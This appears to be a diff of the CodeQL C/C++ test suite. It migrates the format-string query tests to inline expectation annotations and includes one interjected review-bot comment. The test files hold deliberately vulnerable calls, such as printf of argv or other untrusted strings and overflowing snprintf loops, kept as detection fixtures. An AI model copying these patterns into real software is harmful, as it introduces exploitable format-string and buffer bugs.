@@ -1,3 +1,23 @@ +#select +| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | +| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | +| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | +| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | +| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | +| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | +| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | +| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | +| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | +| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | +| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | +| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | +| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| test.cpp:211:5:211:10 | call to printf | printf | +| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | +| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | +| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | +| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | +| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | +| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | edges | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | provenance | | | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | provenance | DataFlowFunction | 
@@ -98,23 +118,3 @@ nodes | test.cpp:247:12:247:16 | *hello | semmle.label | *hello | subpaths | test.cpp:195:31:195:33 | *str | test.cpp:179:6:179:21 | [summary param] *2 in StringCchPrintfW | test.cpp:179:6:179:21 | [summary param] *0 in StringCchPrintfW [Return] | test.cpp:195:20:195:23 | StringCchPrintfW output argument | -#select -| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | -| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | -| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | -| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | -| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | -| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | -| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | -| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | -| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | -| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | -| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | -| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| test.cpp:206:5:206:10 | call to printf | printf | -| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | -| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | -| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | -| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | -| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | -| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | -| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref index ef8de5d288ac..cb71273232ca 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/NonConstantFormat.ql +query: Likely Bugs/Format/NonConstantFormat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp index 1c3d2513da54..d77fa253d7e4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/nested.cpp @@ -18,7 +18,7 @@ extern "C" int snprintf ( char * s, int n, const char * format, ... ); struct A { void do_print(const char *fmt0) { char buf[32]; - snprintf(buf, 32, fmt0); // BAD, all paths from unknown const char*, not assuming literal + snprintf(buf, 32, fmt0); // BAD, all paths from unknown const char*, not assuming literal // $ Alert } }; @@ -39,7 +39,7 @@ struct C { void foo(void) { C c; - c.do_some_printing(c.ext_fmt_str()); + c.do_some_printing(c.ext_fmt_str()); // $ Source } struct some_class { @@ -76,15 +76,15 @@ void diagnostic(const char *fmt, ...) } void bar(void) { - diagnostic (some_instance->get_fmt()); // BAD const char* but not assuming literal + diagnostic (some_instance->get_fmt()); // BAD const char* but not assuming literal // $ Alert } namespace ns { class blab { void out1(void) { - char *fmt = (char *)__builtin_alloca(10); - diagnostic(fmt); // BAD + char *fmt = (char *)__builtin_alloca(10); // $ Source + diagnostic(fmt); // BAD // $ Alert } }; } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp index e60db94f9b1c..26cc4808022a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/test.cpp @@ -43,7 +43,7 @@ const char *const_wash(char *str) { return str; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source const char *message = messages[2]; printf(choose_message(argc - 1), argc - 1); // GOOD printf(messages[1]); // GOOD @@ -127,7 +127,7 @@ int main(int argc, char **argv) { char buffer[1024]; MYSPRINTF(buffer, "constant"); // GOOD - MYSPRINTF(buffer, argv[0]); // BAD + MYSPRINTF(buffer, argv[0]); // BAD // $ Alert } } @@ -164,10 +164,10 @@ void fmt_with_assignment() { printf(y); // GOOD } -void fmt_via_strcpy_bad(char *data) { +void fmt_via_strcpy_bad(char *data) { // $ Source char res[100]; strcpy(res, data); - printf(res); // BAD + printf(res); // BAD // $ Alert } 
@@ -190,61 +190,61 @@ void wchar_t_test_good(){ wprintf(wstr); // GOOD } -void wchar_t_test_bad(wchar_t* str){ +void wchar_t_test_bad(wchar_t* str){ // $ Source wchar_t wstr[100]; - StringCchPrintfW(wstr, 100, str); // BAD + StringCchPrintfW(wstr, 100, str); // BAD // $ Alert - wprintf(wstr); // BAD + wprintf(wstr); // BAD // $ Alert } char* get_string(); void pointer_arithmetic_test_on_bad_string(){ { - const char *hello = get_string(); - printf(hello + 1); // BAD - printf(hello); // BAD + const char *hello = get_string(); // $ Source + printf(hello + 1); // BAD // $ Alert + printf(hello); // BAD // $ Alert } { - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello += 1; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "x = x + 1" syntax - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello = hello + 1; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "x++" syntax - const char *hello = get_string(); + const char *hello = get_string(); // $ Source hello++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but using "++x" as subexpression - const char *hello = get_string(); - printf(++hello); // BAD + const char *hello = get_string(); // $ Source + printf(++hello); // BAD // $ Alert } { // Same as above block but through a pointer - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char **p = &hello; (*p)++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { // Same as above block but through a C++ reference - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char *&p = hello; p++; - printf(hello); // BAD + printf(hello); // BAD // $ Alert } { - const char *hello = get_string(); + const char *hello = get_string(); // $ Source const char *const *p = &hello; - printf(hello); // BAD + 
printf(hello); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref index 1c3184fc6a78..0cda33d916ec 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/SnprintfOverflow.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/SnprintfOverflow.ql +query: Likely Bugs/Format/SnprintfOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp index d2785d845b99..5dd172d81c38 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/SnprintfOverflow/test.cpp @@ -22,7 +22,7 @@ void test1(queue &numbers) while (numbers.has_number()) { - pos += snprintf(&(buffer[pos]), 100 - pos, "%i, ", numbers.get_number()); // BAD + pos += snprintf(&(buffer[pos]), 100 - pos, "%i, ", numbers.get_number()); // BAD // $ Alert } } @@ -59,7 +59,7 @@ void test4(queue &numbers) while (numbers.has_number()) { - amount = snprintf(ptr, remaining, "%i, ", numbers.get_number()); // BAD + amount = snprintf(ptr, remaining, "%i, ", numbers.get_number()); // BAD // $ Alert ptr += amount; remaining -= amount; } @@ -73,7 +73,7 @@ void test5(queue &numbers) while (numbers.has_number()) { - ptr += snprintf(ptr, end - ptr, "%i, ", numbers.get_number()); // BAD + ptr += snprintf(ptr, end - ptr, "%i, ", numbers.get_number()); // BAD // $ Alert } } 
@@ -97,7 +97,7 @@ void test7(const char *strings) // separated by \0, terminated by \0\0 while (*strings != 0) { - pos += snprintf_s(buffer + pos, sizeof(buffer) - pos, "%s\n", strings); // BAD + pos += snprintf_s(buffer + pos, sizeof(buffer) - pos, "%s\n", strings); // BAD // $ Alert // (note that the protections built into `snprintf_s` appear to mean this is less likely // to be exploitable than with `snprintf`) strings += strlen(strings) + 1; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref index 131a39abcf7e..56274d702c0d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/TooManyFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/TooManyFormatArguments.ql +query: Likely Bugs/Format/TooManyFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref index d5e2e86d6e6a..38acf3d83087 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongNumberOfFormatArguments.ql +query: Likely Bugs/Format/WrongNumberOfFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c index ec28ef511449..3e7eb8c547dd 100644 
--- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/a.c @@ -13,9 +13,9 @@ void myMultiplyDefinedPrintf3(const char *extraArg, const char *format, ...); void test_custom_printf1() { - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c index da7f09123af7..ce70464e24d3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/b.c 
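Review bot: The context line `myMultiplyDefinedPrintf2("%i", 0, 1, 2);` in this hunk is commented `[NOT DETECTED]` but carries no inline expectation. Once the `.qlref` files run `InlineExpectationsTestQuery.ql`, that known false negative is recorded only in free text, not in anything the postprocess query checks. I would append `// $ MISSING: Alert[cpp/too-many-format-arguments]` to that line so the gap in format-argument checking is tracked by the test itself. The same applies to the `[NOT DETECTED]` lines in b.c, c.c, test.c, Linux_mixed_byte_wprintf/tests.cpp, pri_macros.h and printf1.h. `test_custom_printf1` continues past the end of the hunk.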
@@ -10,9 +10,9 @@ void myMultiplyDefinedPrintf3(const char *format, ...); void test_custom_printf2() { - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c index 74183c2374f4..5066d606d3f5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/c.c 
@@ -2,9 +2,9 @@ void test_custom_printf2() { // (implicitly defined) - myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) + myMultiplyDefinedPrintf("%i", 0); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] myMultiplyDefinedPrintf("%i", 0, 1); // GOOD - myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) + myMultiplyDefinedPrintf("%i", 0, 1, 2); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] myMultiplyDefinedPrintf2("%i", 0); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1); // GOOD (we can't tell which definition is correct so we have to assume this is OK) myMultiplyDefinedPrintf2("%i", 0, 1, 2); // BAD (too many format arguments regardless of which definition is correct) [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp index 9c04f7a00490..cf2655400fd6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/custom_printf.cpp @@ -26,9 +26,9 @@ void test_custom_printf() { myClass mc; - mc.myPrintf("%i%i", 1); // BAD (too few format arguments) + mc.myPrintf("%i%i", 1); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] mc.myPrintf("%i%i", 1, 2); // GOOD - mc.myPrintf("%i%i", 1, 2, 3); // BAD (too many format arguments) + mc.myPrintf("%i%i", 1, 2, 3); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] mc.myPrintf(NULL, 1, 2, 3); // GOOD (should not be analyzed) } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp index 4d8257b776b2..e94c4b18caf3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/macros.cpp @@ -9,16 +9,16 @@ extern int printf(const char *fmt, ...); void testMacros(int a, int b, int c) { - GOODPRINTF("%i %i\n", a, b, 0); // BAD: too many format arguments + GOODPRINTF("%i %i\n", a, b, 0); // BAD: too many format arguments // $ Alert[cpp/too-many-format-arguments] GOODPRINTF("%i %i %i\n", a, b, c); // GOOD - GOODPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments + GOODPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments // $ Alert[cpp/wrong-number-format-arguments] - BADPRINTF("%i %i\n", a, b, 0); // DUBIOUS: too many format arguments + BADPRINTF("%i %i\n", a, b, 0); // DUBIOUS: too many format arguments // $ Alert[cpp/too-many-format-arguments] // ^ here there are too many format arguments, but the design of the Macro forces the user // to do this, and the extra argument is harmlessly ignored in practice. Reporting these // results can be extremely noisy (e.g. in openldap). BADPRINTF("%i %i %i\n", a, b, c); // GOOD - BADPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments + BADPRINTF("%i %i %i %i\n", a, b, c); // BAD: too few format arguments // $ Alert[cpp/wrong-number-format-arguments] } #define DOTHING(x) \ @@ -29,5 +29,5 @@ void testMacros2() int x; DOTHING(x++); // GOOD - DOTHING(printf("%i", x)); // BAD: the printf inside the macro has too few format arguments + DOTHING(printf("%i", x)); // BAD: the printf inside the macro has too few format arguments // $ Alert[cpp/wrong-number-format-arguments] } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index d10d1025b8f0..df4cd972f502 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -12,7 +12,7 @@ void test_syntax_error() { (UNDEFINED_MACRO)2); // GOOD [FALSE POSITIVE] - printf("%d%d" + printf("%d%d" // $ Alert[cpp/wrong-number-format-arguments] UNDEFINED_MACRO, 1, 2); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c index 0079d0f0d21b..9da418751bc7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/test.c 
@@ -4,41 +4,41 @@ extern int printf(const char *fmt, ...); void test(int i, const char *str) { printf("\n"); // GOOD - printf("\n", i); // BAD (too many format arguments) + printf("\n", i); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] - printf("%i\n"); // BAD (too few format arguments) + printf("%i\n"); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%i\n", i); // GOOD - printf("%*s\n", str); // BAD (too few format arguments) + printf("%*s\n", str); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%*s\n", i, str); // GOOD - printf("%i %i %i\n", 1, 2); // BAD (too few format arguments) + printf("%i %i %i\n", 1, 2); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%i %i %i\n", 1, 2, 3); // GOOD // indexed format arguments - printf("%2$i \n", 1); // BAD (too few format arguments) + printf("%2$i \n", 1); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] printf("%2$i \n", 1, 2); // GOOD - printf("%2$i \n", 1, 2, 3); // BAD (too many format arguments) + printf("%2$i \n", 1, 2, 3); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] printf("%2$i %2$i %2$i \n", 1, 2); // GOOD printf("%2$02i %1$4.2f \n", 3.3333f, 6); // GOOD { int width, num; - printf("%2$*1$d", 0, width, num); // BAD (too many format arguments) + printf("%2$*1$d", 0, width, num); // BAD (too many format arguments) // $ Alert[cpp/too-many-format-arguments] printf("%2$*1$d", width, num); // GOOD - printf("%2$*1$d", width); // BAD (too few format arguments) + printf("%2$*1$d", width); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] - printf("%1$*2$d", 0, num, width); // BAD (too many format arguments) [INCORRECT MESSAGE] - printf("%1$*2$d", num, width); // GOOD [FALSE POSITIVE] + printf("%1$*2$d", 0, num, width); // BAD (too many format arguments) [INCORRECT MESSAGE] // $ 
Alert[cpp/too-many-format-arguments] + printf("%1$*2$d", num, width); // GOOD [FALSE POSITIVE] // $ Alert[cpp/too-many-format-arguments] printf("%1$*2$d", width); // BAD (too few format arguments) [NOT DETECTED] } { int precision; float num; - printf("%2$.*4$f", 0, 0, num, 0, precision); // BAD (too many format arguments) [INCORRECT MESSAGE] - printf("%2$.*4$f", 0, num, 0, precision); // GOOD [FALSE POSITIVE] - printf("%2$.*4$f", num, 0, precision); // BAD (too few format arguments) [INCORRECT MESSAGE] + printf("%2$.*4$f", 0, 0, num, 0, precision); // BAD (too many format arguments) [INCORRECT MESSAGE] // $ Alert[cpp/too-many-format-arguments] + printf("%2$.*4$f", 0, num, 0, precision); // GOOD [FALSE POSITIVE] // $ Alert[cpp/too-many-format-arguments] + printf("%2$.*4$f", num, 0, precision); // BAD (too few format arguments) [INCORRECT MESSAGE] // $ Alert[cpp/too-many-format-arguments] } printf("%@ %i %i", 1, 2); // GOOD @@ -50,7 +50,7 @@ void test(int i, const char *str) // Implicit logger function declaration my_logger(0, "%i %i %i %i %i %i\n", 1, 2, 3, 4, 5, 6); // GOOD my_logger(0, "%i %i %i\n", 1, 2, 3); // 